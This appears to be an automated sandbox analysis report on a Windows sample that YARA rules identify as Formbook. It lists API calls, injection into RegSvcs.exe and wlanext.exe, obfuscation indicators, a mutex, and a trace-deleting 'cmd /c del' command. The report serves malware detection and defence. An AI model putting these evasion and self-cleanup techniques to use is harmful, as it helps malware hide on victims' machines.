Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FEAD30 NtSetContextThread, 3_2_00FEAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9520 NtWaitForSingleObject, 3_2_00FE9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE96D0 NtCreateKey, 3_2_00FE96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9670 NtQueryInformationProcess, 3_2_00FE9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9650 NtQueryValueKey, 3_2_00FE9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9610 NtEnumerateValueKey, 3_2_00FE9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9770 NtSetInformationFile, 3_2_00FE9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FEA770 NtOpenThread, 3_2_00FEA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9760 NtOpenProcess, 3_2_00FE9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9730 NtQueryVirtualMemory, 3_2_00FE9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FEA710 NtOpenProcessToken, 3_2_00FEA710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_03308390 NtAllocateVirtualMemory, 7_2_03308390
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_03308260 NtReadFile, 7_2_03308260
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033082E0 NtClose, 7_2_033082E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033081B0 NtCreateFile, 7_2_033081B0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330825A NtReadFile, 7_2_0330825A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033082DA NtClose, 7_2_033082DA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033081AA NtCreateFile, 7_2_033081AA
Detected potential crypto function
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_00E55871 0_2_00E55871
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_00E559CA 0_2_00E559CA
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_00E55998 0_2_00E55998
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_00E56501 0_2_00E56501
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_0310B15C 0_2_0310B15C
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_0310C428 0_2_0310C428
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_03109890 0_2_03109890
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_0310DE90 0_2_0310DE90
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_0310FD5F 0_2_0310FD5F
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_0310FD70 0_2_0310FD70
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D4418 0_2_057D4418
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D6EF8 0_2_057D6EF8
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D6B70 0_2_057D6B70
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057DA608 0_2_057DA608
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D8091 0_2_057D8091
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D8318 0_2_057D8318
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D6F50 0_2_057D6F50
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_057D6F95 0_2_057D6F95
Source: C:\Users\user\Desktop\00098765123POIIU.exe Code function: 0_2_00E53C88 0_2_00E53C88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00401026 3_2_00401026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041BA6D 3_2_0041BA6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00408C4C 3_2_00408C4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00408C50 3_2_00408C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041B4B8 3_2_0041B4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00402D87 3_2_00402D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041C773 3_2_0041C773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041BFFF 3_2_0041BFFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBB090 3_2_00FBB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061002 3_2_01061002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107E824 3_2_0107E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010720A8 3_2_010720A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010728EC 3_2_010728EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAF900 3_2_00FAF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01072B28 3_2_01072B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106DBD2 3_2_0106DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010603DA 3_2_010603DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105FA2B 3_2_0105FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDEBB0 3_2_00FDEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010722AE 3_2_010722AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01072D07 3_2_01072D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01071D55 3_2_01071D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010725DD 3_2_010725DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB841F 3_2_00FB841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBD5E0 3_2_00FBD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106D466 3_2_0106D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2581 3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA0D20 3_2_00FA0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107DFCE 3_2_0107DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC6E30 3_2_00FC6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01071FF1 3_2_01071FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106D616 3_2_0106D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01072EF7 3_2_01072EF7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330C773 7_2_0330C773
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F2FB0 7_2_032F2FB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F2D87 7_2_032F2D87
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F2D90 7_2_032F2D90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F8C4C 7_2_032F8C4C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F8C50 7_2_032F8C50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330B4B8 7_2_0330B4B8
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00FAB150 appears 45 times
Sample file is different than original file name gathered from version info
Source: 00098765123POIIU.exe, 00000000.00000002.337981677.0000000003303000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll( vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.336669246.0000000000F3E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameApplicationStateDisposition.exeF vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.339649997.0000000004378000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.337814717.0000000003261000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe Binary or memory string: OriginalFilenameApplicationStateDisposition.exeF vs 00098765123POIIU.exe
Uses 32bit PE files
Source: 00098765123POIIU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00098765123POIIU.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@14/8
Source: C:\Users\user\Desktop\00098765123POIIU.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\00098765123POIIU.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
Source: C:\Users\user\Desktop\00098765123POIIU.exe Mutant created: \Sessions\1\BaseNamedObjects\niuhQPClXbX
Source: 00098765123POIIU.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\00098765123POIIU.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: 00098765123POIIU.exe ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\00098765123POIIU.exe File read: C:\Users\user\Desktop\00098765123POIIU.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\00098765123POIIU.exe 'C:\Users\user\Desktop\00098765123POIIU.exe'
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: 00098765123POIIU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 00098765123POIIU.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.378316502.000000000109F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00404837 push ebx; retf 3_2_0040483B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041C892 pushfd ; retf 3_2_0041C893
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004151E2 push esp; iretd 3_2_004151E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004191B9 push esi; iretd 3_2_004191BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041B3F2 push eax; ret 3_2_0041B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041B3FB push eax; ret 3_2_0041B462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041B3A5 push eax; ret 3_2_0041B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041B45C push eax; ret 3_2_0041B462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041C4D4 push esi; ret 3_2_0041C4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00415D14 push ebp; retf 3_2_00415D19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00419F79 push ebp; ret 3_2_00419F7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FFD0D1 push ecx; ret 3_2_00FFD0E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330B3A5 push eax; ret 7_2_0330B3F8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330B3F2 push eax; ret 7_2_0330B3F8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330B3FB push eax; ret 7_2_0330B462
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033091B9 push esi; iretd 7_2_033091BA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_033051E2 push esp; iretd 7_2_033051E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_032F4837 push ebx; retf 7_2_032F483B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330C892 pushfd ; retf 7_2_0330C893
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_03309F79 push ebp; ret 7_2_03309F7A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_03305D14 push ebp; retf 7_2_03305D19
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330B45C push eax; ret 7_2_0330B462
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 7_2_0330C4D4 push esi; ret 7_2_0330C4D8
Source: initial sample Static PE information: section name: .text entropy: 7.9019999335
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
